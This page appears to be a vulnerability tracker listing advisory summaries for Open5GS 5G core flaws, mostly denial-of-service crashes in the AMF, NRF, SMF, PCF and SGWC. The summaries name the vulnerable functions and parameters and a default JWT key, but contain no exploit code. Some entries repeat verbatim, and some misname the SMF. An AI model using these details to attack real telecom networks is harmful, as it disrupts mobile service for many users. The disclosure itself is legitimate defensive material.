Open5gs
Monthly
Race condition in Open5GS AMF up to version 2.7.6 allows a remote, low-privileged attacker to trigger concurrent NGAP Security Mode Command processing in gmm_state_security_mode (src/amf/gmm-sm.c), resulting in low availability impact. Publicly available exploit code exists (N2-SMC-Concurrent.zip), though no public exploit identified at time of analysis indicates active exploitation and this CVE is not listed in CISA KEV. Notably, the associated fix PR (#4501) addresses a broader NGAP identity-scoping flaw - where the AMF accepted UE-associated NGAP messages from any gNB regardless of which gNB originally registered the UE - suggesting the underlying attack surface may exceed what the formal CVSS score of 3.1 captures.
Authentication bypass in Open5GS versions up to 2.7.6 allows remote attackers to manipulate UE security capabilities through the AMF's NGAP PathSwitchRequest message handler in src/amf/ngap-handler.c. The flaw stems from the AMF blindly overwriting locally stored UE 5G security capabilities with values received from a target gNB during a path switch, violating 3GPP TS 33.501 6.7.3.1, and publicly available exploit code exists though no public exploit identified as actively exploited at time of analysis.
Denial of service in Open5GS up to version 2.7.7 is triggerable by a low-privileged remote attacker via the `ogs_pool_id_calloc` function in the SBI nghttp2-server library, causing availability degradation of 5G core network functions. The CVSS temporal modifiers confirm both a public proof-of-concept (E:P) and an official remedy (RL:O). No public exploit identified at time of analysis as confirmed by CISA KEV, but the publicly available PoC on GitHub (issue #4474) materially lowers the exploitation barrier for actors with access to SBI endpoints.
Timer pool exhaustion in Open5GS up to 2.7.7 allows an authenticated remote attacker with low privileges to crash the UE authentication service via rapid HTTP/2 stream resets against the ue-authentications SBI endpoint. The root cause is CWE-404: response timers for outbound SBI transactions are not released when the originating inbound HTTP/2 stream closes prematurely (via RST_STREAM or connection drop), causing the timer pool to exhaust when a peer resets streams rapidly while upstream network functions are slow or unresponsive. No public exploit identified at time of analysis as KEV status, but a publicly available exploit code exists via GitHub issue #4473, and an upstream fix is available in PR #4578.
Denial-of-service via reachable assertion in Open5GS NRF (Network Repository Function) up to version 2.7.7 allows an authenticated low-privilege network peer to crash the NRF process with SIGABRT by submitting a crafted NFProfile registration payload with oversized inner-list arrays in SMF or AMF info sections. The NRF is a critical singleton service registry in 5G Service-Based Architecture - crashing it disrupts NF discovery for the entire 5G core, making the practical operational impact greater than the A:L CVSS impact rating alone suggests. Publicly available exploit code exists (GitHub issue #4469 and CVSS temporal E:P), though no confirmed active exploitation via CISA KEV has been recorded at time of analysis.
Out-of-bounds write in Open5GS versions up to 2.7.7 allows a remote, low-privileged attacker to crash the NRF (Network Repository Function) component by sending a malformed SCP info payload, resulting in a denial-of-service condition. The vulnerability resides in the handle_scp_info function within the Shared NF-profile Parser (lib/sbi/nnrf-handler.c), a critical parsing path for 5G service-based interface communication. A public proof-of-concept exploit has been disclosed via the project's GitHub issue tracker, materially lowering the bar for exploitation against unpatched deployments.
Denial of service in Open5GS NRF (Network Repository Function) through version 2.7.7 allows an authenticated network peer to crash the NRF process with SIGABRT by submitting a crafted SMF or AMF NF-profile registration containing oversized inner-loop arrays. The NRF's shared NF-profile parser in lib/sbi/nnrf-handler.c used reachable ogs_assert() calls - rather than graceful bounds checks - to enforce limits on DNN entries per S-NSSAI slice and TAC range entries per TAI range, making them triggerable by peer-supplied payloads. Publicly available exploit code exists (GitHub issue #4467); the CVSSv4 score of 2.1 reflects scoped low-availability impact but understates operational risk given the NRF's central role in 5G core service discovery.
Use-after-free vulnerability in Open5GS NRF component (versions up to 2.7.7) allows authenticated remote attackers to trigger denial of service via the discover_handler function in nghttp2-server.c. Publicly available exploit code exists (GitHub issue #4476), but vendor has not responded to early disclosure. EPSS data not available; CVSS 4.3 (Medium) reflects limited scope (DoS only, authenticated access required). Not listed in CISA KEV, indicating no confirmed widespread exploitation despite public POC.
Remote authenticated denial of service in Open5GS versions up to 2.7.7 allows attackers to crash the AUSF (Authentication Server Function) component via crafted timer manipulation. The vulnerability resides in ogs_timer_add function within nausf-handler.c. Public exploit code exists via GitHub issue #4472, though vendor has not responded to disclosure. EPSS data unavailable; CVSS 4.0 scores only 2.1 due to low availability impact and authenticated requirement, but the existence of public exploit elevates practical risk for exposed 5G core deployments.
Denial of service in Open5GS NRF (Network Repository Function) allows authenticated remote attackers to crash the service by exhausting the nf_service resource pool. Open5GS versions up to 2.7.7 fail to validate pool allocation during NF service registration, triggering assertion failures that terminate the process. Publicly available exploit code exists (GitHub issue #4466). EPSS data not available, not listed in CISA KEV. Patch released via commit 819db11a08b9736a3576c4f99ceb28f7eb99523a, merged in PR #4534.
Improper authorization in Open5GS AMF/MME component (versions up to 2.7.6) allows authenticated network attackers to manipulate NGAP user context lookups, potentially accessing or interfering with other users' 5G/LTE sessions. The vulnerability stems from insufficient validation of AMF_UE_NGAP_ID and RAN_UE_NGAP_ID pairs in the ran_ue_find_by_amf_ue_ngap_id function, enabling attackers with low-level network privileges to bypass session-to-base-station association controls. Publicly available exploit code exists (GitHub issue #4498), and a vendor-released patch (commit 5746b857) is available. CVSS 6.3 (Medium) reflects network vector with low attack complexity but requires authentication.
Denial of service vulnerability in Open5GS NRF client management (versions ≤2.7.7) allows authenticated remote attackers to crash the Network Repository Function service via malformed client pool arguments. Public exploit code exists (GitHub issue #4464), but vendor has not responded to disclosure. CVSS base score of 4.3 reflects low severity due to limited availability impact and authentication requirement. EPSS data not provided; KEV status not applicable for this unpatched issue.
Denial of service in Open5GS versions up to 2.7.6 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via crafted nfInstanceId parameter manipulation in the ogs_sbi_nf_instance_set_id function. Publicly available exploit code exists (GitHub issue #4462), but vendor has not responded to early responsible disclosure. EPSS data not available, not listed in CISA KEV. CVSS 4.3 (Medium) reflects low impact (availability only) and authenticated attack vector.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component by manipulating service-names or snssais parameters in SBI messages. A public proof-of-concept exploit exists via GitHub issue #4460, and the vendor has not responded to the early disclosure. EPSS data unavailable, but the low CVSS 4.3 score reflects limited impact (availability only, authenticated access required), reducing real-world urgency for most deployments.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via malformed target-plmn-list parameters. The vulnerability targets a parsing function in the Service-Based Interface (SBI) library and has publicly available exploit code (GitHub issue #4458). CVSS 4.3 reflects low severity, but the vendor has not responded to early disclosure attempts, leaving no confirmed patch timeline. EPSS and KEV data unavailable - exploitation likelihood beyond POC unknown.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NRF component by manipulating the hnrf-uri argument passed to the yuarel_parse function in /lib/sbi/conv.c. The vulnerability has a publicly available exploit and low CVSS score (4.3) due to authentication requirement and limited scope, but affects a critical 5G network function with potential operational impact.
Denial of service in Open5GS NRF component up to version 2.7.7 allows remote authenticated attackers to exhaust the nf_service memory pool via the ogs_nnrf_nfm_handle_nf_profile function, causing the process to abort via failed assertion. Publicly available exploit code exists, and a vendor patch is available but awaits acceptance into the main branch.
Denial of service in Open5GS through version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) by manipulating the smf_nsmf_handle_update_data_in_vsmf function in nsmf-handler.c. Publicly available exploit code exists, and the project maintainers have not yet responded to the early disclosure notification despite awareness of the issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) by manipulating the qosFlowProfile argument in the smf_nsmf_handle_update_data_in_vsmf function. Publicly available exploit code exists, and the vulnerability affects the 5G core network's ability to manage quality-of-service parameters, though the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS SMF (Session Management Function) via crafted PDU Session Modification messages allows remote authenticated attackers to trigger unvalidated parameter processing in gsm_handle_pdu_session_modification_qos_flow_descriptions(), causing service disruption. The vulnerability stems from insufficient pre-validation of QoS flow parameter identifiers and bitrate units before state mutation, potentially leaving the SMF in an inconsistent state. Publicly available exploit code exists, and a fix awaits upstream acceptance in PR #4513.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) via manipulation of QoS rule parsing in the ogs_nas_parse_qos_rules function. The vulnerability has a low CVSS score of 2.1 but public exploit code is available; however, exploitation requires prior authentication and causes only availability impact without confidentiality or integrity compromise.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component's smf_nsmf_handle_create_sm_context function, allowing authenticated remote attackers to crash or degrade the 5G core network service through malformed session context creation requests. Public exploit code exists and the vulnerability has low real-world severity (CVSS 2.1) due to requirement for authenticated access and availability impact only, though active 5G infrastructure targeting remains a concern given the critical nature of SMF in telecom deployments.
Denial of service in Open5GS up to version 2.7.7 affects the SMF component's OpenAPI_list_create function, allowing authenticated remote attackers to cause service unavailability through resource manipulation. The vulnerability has low to moderate severity (CVSS 4.3) with publicly disclosed proof-of-concept code, though the vendor has not yet responded to early disclosure notification.
Remote authenticated denial of service in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component, specifically in the smf_nsmf_handle_created_data_in_vsmf function. An authenticated attacker can remotely trigger a denial of service condition by sending crafted requests. Public exploit code is available (CVE-2026-8267 GitHub issue #4448), though the vendor has not yet released a patched version despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) via manipulation of the PDU session establishment acceptance function, resulting in service unavailability. The CVSS score of 4.3 reflects low severity due to authentication requirements and availability-only impact, though publicly available exploit code exists and the vulnerability has been reported to the project without acknowledged response.
Null pointer dereference in Open5GS Session Management Function (SMF) up to version 2.7.7 allows authenticated remote attackers to cause denial of service by manipulating the smf_nsmf_handle_create_data_in_hsmf function. Publicly available exploit code exists, and the project has been notified but has not yet released a patch.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Mobile Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in the Policy and Charging Control (PCC) handler. The vulnerability has a CVSS score of 2.1 with low availability impact; publicly available exploit code exists, and the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 via the smf_n4_build_qos_flow_to_modify_list function in the SMF (Session Management Function) component allows remote authenticated attackers to crash the service with low attack complexity. The vulnerability has been publicly disclosed with exploit code available; the vendor was notified early but has not yet released a fix.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Measurement Function (SMF) component via improper handling in the update_authorized_pcc_rule_and_qos function. The vulnerability has a publicly available exploit and moderate CVSS score (4.3) but is limited to authenticated access and results in availability impact only. The vendor has not yet released a patch despite early notification through a GitHub issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Mobility Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in npcf-handler.c. Publicly available exploit code exists, and the vendor has not released a patch despite early notification through issue tracking.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the service by triggering improper exception handling in the ogs_pcc_rule_install_flow_from_media function within the PCC rule processing library. Publicly available exploit code exists, and the project maintainers have not responded to the early notification despite issue tracking.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) by manipulating the SmPolicyContextData.ipv6AddressPrefix parameter in the pcf_sess_set_ipv6prefix function. The vulnerability has publicly available exploit code and was disclosed despite vendor non-responsiveness, making it a known attack vector against 5G service provider infrastructure.
Denial of service in Open5GS up to version 2.7.7 via manipulation of the pcf_sess_sbi_discover_and_send function in the sm-policies endpoint allows remote unauthenticated attackers to disrupt service availability. Publicly available exploit code exists, and the upstream project has not yet issued a patch despite early notification via issue report.
Remote denial of service in Open5GS up to version 2.7.7 affects the sm-policies endpoint's pcf_nbsf_management_handle_register function, allowing unauthenticated network attackers to trigger a crash or service disruption with low attack complexity. Publicly available exploit code exists and the vendor was notified early but has not released a fix.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) service by sending crafted requests to the delete endpoint in the SM policy control handler (pcf_npcf_smpolicycontrol_handle_delete). The vulnerability has a publicly available proof of concept and impacts the availability of 5G network policy enforcement, though the vendor has not yet released a patch despite early notification.
Out-of-bounds read in Open5GS up to version 2.7.7 allows remote attackers to trigger information disclosure via manipulation of the ogs_sbi_client_send_via_scp_or_sepp function in lib/sbi/client.c during Service-Based Interface (SBI) communication. The vulnerability exploits improper bounds checking when extracting paths from URIs, affecting the Network Function (NF) component. CVSS 6.9 (network-accessible, low complexity, no privileges required) with availability impact. Upstream patch commit d5bc487fcf9ea87d2b03f2ef95123af344773bfb available.
Denial of service in Open5GS User Plane Function (UPF) up to version 2.7.7 allows remote, unauthenticated attackers to exhaust server resources through manipulation of GTPv1-U packet handling in the _gtpv1_u_recv_cb function. The vulnerability enables resource consumption attacks against 5G core network infrastructure without requiring authentication or user interaction. Vendor notification occurred via GitHub issue #4492 but has not received developer response or a released patch.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's ogs_sbi_discovery_option_add_snssais function, allowing authenticated remote attackers to crash the service via a network request. The vulnerability has been publicly disclosed with exploit code available on GitHub, though the vendor has not yet responded to early notification.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the NSSF component's service discovery function, allowing remote authenticated attackers to cause availability impact through manipulation of the ogs_sbi_discovery_option_add_service_names function. Public exploit code exists and the vulnerability carries low CVSS score (2.1) reflecting limited impact scope, though the project has not yet responded to early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NSSF (Network Slice Selection Function) component via a crafted PLMN list in the SBI (Service Based Interface) parser. The vulnerability exists in the ogs_sbi_parse_plmn_list function within /lib/sbi/conv.c and has been publicly disclosed with exploit code available; the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to manipulate the NSSF network selection function via the nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf handler in /src/nssf/nnssf-handler.c, causing service unavailability. Public exploit code exists and the vulnerability has been reported to the project, though no patch has been released as of analysis time.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's stream identification function in the nghttp2-server library. Local authenticated attackers can manipulate the ogs_sbi_stream_find_by_id function to cause service unavailability. Publicly available exploit code exists, though the vendor has not yet responded to early disclosure notification.
Denial of service in Open5GS up to version 2.7.7 affects the AMF 3GPP access endpoint handler (udm_nudm_uecm_handle_amf_registration_update function), allowing authenticated remote attackers to crash the UDM service via malformed registration update messages. Publicly available exploit code exists, and the vendor was notified early but has not released a patch as of the analysis date.
Denial of service in Open5GS up to version 2.7.7 affects the udm_state_operational function in the smf-registrations endpoint, allowing authenticated remote attackers to manipulate the function and cause service unavailability. The vulnerability has publicly available exploit code and carries a low CVSS score of 2.1 due to required authentication and limited availability impact, though the project has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 affects the authentication-subscription endpoint handler, allowing authenticated remote attackers to manipulate the udm_nudr_dr_handle_subscription_authentication function and cause service unavailability. Public exploit code exists and the vulnerability has been reported to the project without a confirmed vendor response or patch release.
Denial of service in Open5GS UDR component up to version 2.7.7 allows authenticated remote attackers to crash the subscription data service by manipulating the supi_id argument to the ogs_dbi_subscription_data function. Publicly available exploit code exists, and the vendor has been notified via issue report but has not yet released a patch.
Denial of service in Open5GS UDR component (versions up to 2.7.7) via malformed pei argument in udr_nudr_dr_handle_subscription_context function allows authenticated remote attackers to crash the User Data Repository service with low complexity. Publicly available exploit code exists; vendor has not responded to early notification.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component by exploiting improper error handling in the gmm_handle_service_request function. The vulnerability requires low-privilege authentication to trigger and results in service unavailability. A public exploit has been disclosed via GitHub issue tracker, though the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS AMF (Access and Mobility Function) up to version 2.7.6 allows authenticated remote attackers to cause service unavailability by sending crafted registration requests with manipulated reg_type arguments. The vulnerability exists in the GMM (Mobility Management) handler due to insufficient validation of registration type values, potentially triggering null pointer dereferences or assertion failures. Vendor-released patch version 2.7.7 is available.
Denial of service in Open5GS AMF component up to version 2.7.7 allows authenticated remote attackers to trigger resource exhaustion via improper handling of PDU session context update messages in the amf_nsmf_pdusession_handle_update_sm_context function. The vulnerability has a low CVSS score (2.1) but publicly available exploit code exists; however, exploitation requires prior authentication to the 5G network, significantly limiting real-world attack surface.
Denial of service in Open5GS up to version 2.7.7 affects the AMF (Access and Mobility Function) component, specifically the ogs_id_get_value function in nudm-handler.c, allowing remote authenticated attackers to cause service unavailability. Publicly available exploit code exists, and the vulnerability has been reported to the project via GitHub issue #4405 without vendor acknowledgment or patch release at time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component via manipulation of the amf_nudm_sdm_handle_provisioned function in the NUDM handler. The vulnerability has publicly available exploit code and affects the authentication and mobility management core of 5G networks, requiring valid credentials to trigger but resulting in service unavailability. Public disclosure has occurred without vendor remediation at the time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the BSF (Binding Support Function) component by manipulating the ipv6Prefix argument in the bsf_sess_find_by_ipv6prefix function. The vulnerability has a low CVSS score of 2.1 due to requiring authentication and causing only availability impact, but publicly available exploit code exists and the vendor has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the BSF (Binding Support Function) service by manipulating the ipv4Addr parameter in the /nbsf-management/v1/pcfBindings endpoint. The vulnerability has publicly available exploit code and affects a core 5G network function, creating operational risk for mobile networks relying on this open-source implementation.
Denial of service in Open5GS 2.7.6 via malformed CCA (Credit-Control-Answer) messages in the SMF (Session Management Function) component allows remote attackers to crash the service without authentication. The vulnerability affects the smf_gx_cca_cb, smf_gy_cca_cb, and smf_s6b functions in the CCA Message Handler, with publicly available exploit code demonstrating the attack despite high complexity requirements. CVSS 6.3 reflects the availability impact and remote attack vector, though exploitation requires crafted network conditions.
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.
Open5GS 2.7.6 is vulnerable to denial of service through improper handling of S11 session response messages in the MME component, allowing remote unauthenticated attackers to crash the service. Public exploit code exists for this vulnerability, and the vendor has not yet provided a patch despite early notification.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service condition in the SMF component's PDP context request handler, which can be triggered remotely without authentication. An attacker can exploit this reachable assertion flaw to crash the service, and public exploit code is currently available. No patch has been released by the project despite early notification of the issue.
Memory corruption in Open5GS up to version 2.7.6 allows remote attackers to cause denial of service through manipulation of the MME component's esm-build.c file. Public exploit code exists for this vulnerability, and the Open5GS project has not yet released a patch despite early notification.
Memory corruption in Open5GS versions up to 2.7.6 allows remote attackers to trigger a denial of service condition by manipulating the SGW-C session creation handler, with public exploit code already available. The vulnerability requires no authentication or user interaction and currently lacks a vendor patch, leaving affected deployments vulnerable to remote availability attacks.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service attack in the SMF component's TFT parsing function when a crafted packet manipulates the traffic filter content length parameter. An unauthenticated remote attacker can trigger this flaw to crash the service, and public exploit code exists with no patch currently available.
Open5GS versions up to 2.7.6 suffer from a null pointer dereference in the PGW S5U Address Handler component that can be triggered remotely without authentication, resulting in denial of service. Public exploit code exists for this vulnerability, and administrators should apply the available patch immediately.
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function hss_ogs_diam_cx_mar_cb of the file src/hss/hss-cx-path.c of the component VoLTE Cx-Test. [CVSS 7.3 HIGH]
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to trigger a reachable assertion in the SGWC component by manipulating PDR arguments in the sgwc_tunnel_add function. Public exploit code exists for this vulnerability, and no patch is currently available despite reports indicating a fix is planned.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the CreateBearerRequest handler that allows unauthenticated remote attackers to trigger a denial of service condition. Public exploit code exists for this vulnerability, and no patch is currently available. The impact is limited to service availability, with a CVSS score of 5.3.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the SGWC S11 handler that can be triggered remotely without authentication to cause a denial of service. Public exploit code exists for this vulnerability, and while a patch is reported as already-fixed, it remains unavailable for affected deployments.
Denial of service in Open5GS up to version 2.7.6 allows remote attackers to crash the SGWC service by manipulating the Modify Bearer Request handler in s11-handler.c. Public exploit code exists for this vulnerability and no patch is currently available. Organizations running affected versions should apply updates as they become available and consider network-level mitigations to restrict access to the S11 interface.
Remote denial of service in Open5GS up to version 2.7.5 affects the SGWC component's TEID-to-IP conversion function, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, and while a fix has been developed, no official patch is currently available for affected deployments.
Remote denial of service in Open5GS up to version 2.7.6 affects the SGWC component's bearer response handler, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, though a patch (commit b19cf6a) is available to resolve it.
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to crash the SGWC component by manipulating bearer resource failure indication messages. Public exploit code exists for this vulnerability, and a patch is available in commit 69b53add90a9479d7960b822fc60601d659c328b.
Open5gs WebUI authentication can be bypassed by attackers who exploit the default hardcoded JWT signing key ("change-me") that is used when the JWT_SECRET_KEY environment variable is not configured. An attacker can forge valid JWT tokens to gain unauthorized access to the WebUI with limited confidentiality and integrity impacts. A patch is available to remediate this vulnerability by enforcing proper key configuration or using secure defaults.
A vulnerability was determined in Open5GS up to 2.7.6. Impacted is the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c of the component sgwc. [CVSS 5.3 MEDIUM]
A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. [CVSS 5.3 MEDIUM]
A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. [CVSS 5.3 MEDIUM]
A vulnerability was determined in Open5GS up to 2.7.6. This affects the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. [CVSS 5.3 MEDIUM]
A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. [CVSS 3.3 LOW]
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c of the component Bearer QoS IE Length Handler. [CVSS 3.3 LOW]
A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. [CVSS 3.3 LOW]
Improper initialization in the PFCP handler function ogs_pfcp_handle_create_pdr within Open5GS up to version 2.7.5 allows remote attackers to trigger information disclosure with high attack complexity. The vulnerability has a publicly available proof-of-concept and carries a very low EPSS score (0.15%), indicating minimal real-world exploitation probability despite public availability of exploit code. CVSS 2.9 reflects the limited technical impact (availability of confidentiality only), but the high complexity and resource requirements make practical attacks difficult.
Reachable assertion in Open5GS up to version 2.7.6 affects the PFCP context management functions (PDR, FAR, URR, QER) in lib/pfcp/context.c, allowing remote attackers to trigger a denial of service condition via crafted PFCP messages. The vulnerability requires high attack complexity and has low availability impact, but publicly available exploit code exists. CVSS 2.9 / EPSS 0.14% indicates low real-world exploitation probability despite public POC.
Null pointer dereference in Open5GS up to version 2.7.5 allows remote authenticated attackers to cause denial of service by sending manipulated PFCP (Packet Forwarding Control Protocol) packets that trigger improper handling in the FAR-ID handler component. The vulnerability requires high attack complexity and authenticated access, limiting real-world exploitation despite publicly available proof-of-concept code and a low CVSS score of 1.3 reflecting restricted impact scope.
In Open5GS 2.7.6, AMF crashes when receiving an abnormal NGSetupRequest message, resulting in denial of service. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Uncontrolled Resource Consumption vulnerability could allow attackers to cause denial of service by exhausting system resources.
Open5GS v2.7.5, prior to commit 67ba7f92bbd7a378954895d96d9d7b05d5b64615, is vulnerable to a NULL pointer dereference when a multipart/related HTTP POST request with an empty HTTP body is sent to the. Rated medium severity (CVSS 4.0), this vulnerability is no authentication required, low attack complexity. Public exploit code available.
An issue in Open5GS v2.7.2 and before allows a remote attacker to cause a denial of service via a crafted Create Session Request message to the SMF (PGW-C), using the IP address of a legitimate UE in. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Assertion failure in function ngap_build_downlink_nas_transport in file src/amf/ngap-build.c, the Access and Mobility Management Function (AMF) component, in Open5GS thru 2.7.5 allowing attackers to. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A security flaw has been discovered in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A vulnerability was determined in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A vulnerability was found in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
Race condition in Open5GS AMF up to version 2.7.6 allows a remote, low-privileged attacker to trigger concurrent NGAP Security Mode Command processing in gmm_state_security_mode (src/amf/gmm-sm.c), resulting in low availability impact. Publicly available exploit code exists (N2-SMC-Concurrent.zip), though no public exploit identified at time of analysis indicates active exploitation and this CVE is not listed in CISA KEV. Notably, the associated fix PR (#4501) addresses a broader NGAP identity-scoping flaw - where the AMF accepted UE-associated NGAP messages from any gNB regardless of which gNB originally registered the UE - suggesting the underlying attack surface may exceed what the formal CVSS score of 3.1 captures.
Authentication bypass in Open5GS versions up to 2.7.6 allows remote attackers to manipulate UE security capabilities through the AMF's NGAP PathSwitchRequest message handler in src/amf/ngap-handler.c. The flaw stems from the AMF blindly overwriting locally stored UE 5G security capabilities with values received from a target gNB during a path switch, violating 3GPP TS 33.501 6.7.3.1, and publicly available exploit code exists though no public exploit identified as actively exploited at time of analysis.
Denial of service in Open5GS up to version 2.7.7 is triggerable by a low-privileged remote attacker via the `ogs_pool_id_calloc` function in the SBI nghttp2-server library, causing availability degradation of 5G core network functions. The CVSS temporal modifiers confirm both a public proof-of-concept (E:P) and an official remedy (RL:O). No public exploit identified at time of analysis as confirmed by CISA KEV, but the publicly available PoC on GitHub (issue #4474) materially lowers the exploitation barrier for actors with access to SBI endpoints.
Timer pool exhaustion in Open5GS up to 2.7.7 allows an authenticated remote attacker with low privileges to crash the UE authentication service via rapid HTTP/2 stream resets against the ue-authentications SBI endpoint. The root cause is CWE-404: response timers for outbound SBI transactions are not released when the originating inbound HTTP/2 stream closes prematurely (via RST_STREAM or connection drop), causing the timer pool to exhaust when a peer resets streams rapidly while upstream network functions are slow or unresponsive. No public exploit identified at time of analysis as KEV status, but a publicly available exploit code exists via GitHub issue #4473, and an upstream fix is available in PR #4578.
Denial-of-service via reachable assertion in Open5GS NRF (Network Repository Function) up to version 2.7.7 allows an authenticated low-privilege network peer to crash the NRF process with SIGABRT by submitting a crafted NFProfile registration payload with oversized inner-list arrays in SMF or AMF info sections. The NRF is a critical singleton service registry in 5G Service-Based Architecture - crashing it disrupts NF discovery for the entire 5G core, making the practical operational impact greater than the A:L CVSS impact rating alone suggests. Publicly available exploit code exists (GitHub issue #4469 and CVSS temporal E:P), though no confirmed active exploitation via CISA KEV has been recorded at time of analysis.
Out-of-bounds write in Open5GS versions up to 2.7.7 allows a remote, low-privileged attacker to crash the NRF (Network Repository Function) component by sending a malformed SCP info payload, resulting in a denial-of-service condition. The vulnerability resides in the handle_scp_info function within the Shared NF-profile Parser (lib/sbi/nnrf-handler.c), a critical parsing path for 5G service-based interface communication. A public proof-of-concept exploit has been disclosed via the project's GitHub issue tracker, materially lowering the bar for exploitation against unpatched deployments.
Denial of service in Open5GS NRF (Network Repository Function) through version 2.7.7 allows an authenticated network peer to crash the NRF process with SIGABRT by submitting a crafted SMF or AMF NF-profile registration containing oversized inner-loop arrays. The NRF's shared NF-profile parser in lib/sbi/nnrf-handler.c used reachable ogs_assert() calls - rather than graceful bounds checks - to enforce limits on DNN entries per S-NSSAI slice and TAC range entries per TAI range, making them triggerable by peer-supplied payloads. Publicly available exploit code exists (GitHub issue #4467); the CVSSv4 score of 2.1 reflects scoped low-availability impact but understates operational risk given the NRF's central role in 5G core service discovery.
Use-after-free vulnerability in Open5GS NRF component (versions up to 2.7.7) allows authenticated remote attackers to trigger denial of service via the discover_handler function in nghttp2-server.c. Publicly available exploit code exists (GitHub issue #4476), but vendor has not responded to early disclosure. EPSS data not available; CVSS 4.3 (Medium) reflects limited scope (DoS only, authenticated access required). Not listed in CISA KEV, indicating no confirmed widespread exploitation despite public POC.
Remote authenticated denial of service in Open5GS versions up to 2.7.7 allows attackers to crash the AUSF (Authentication Server Function) component via crafted timer manipulation. The vulnerability resides in ogs_timer_add function within nausf-handler.c. Public exploit code exists via GitHub issue #4472, though vendor has not responded to disclosure. EPSS data unavailable; CVSS 4.0 scores only 2.1 due to low availability impact and authenticated requirement, but the existence of public exploit elevates practical risk for exposed 5G core deployments.
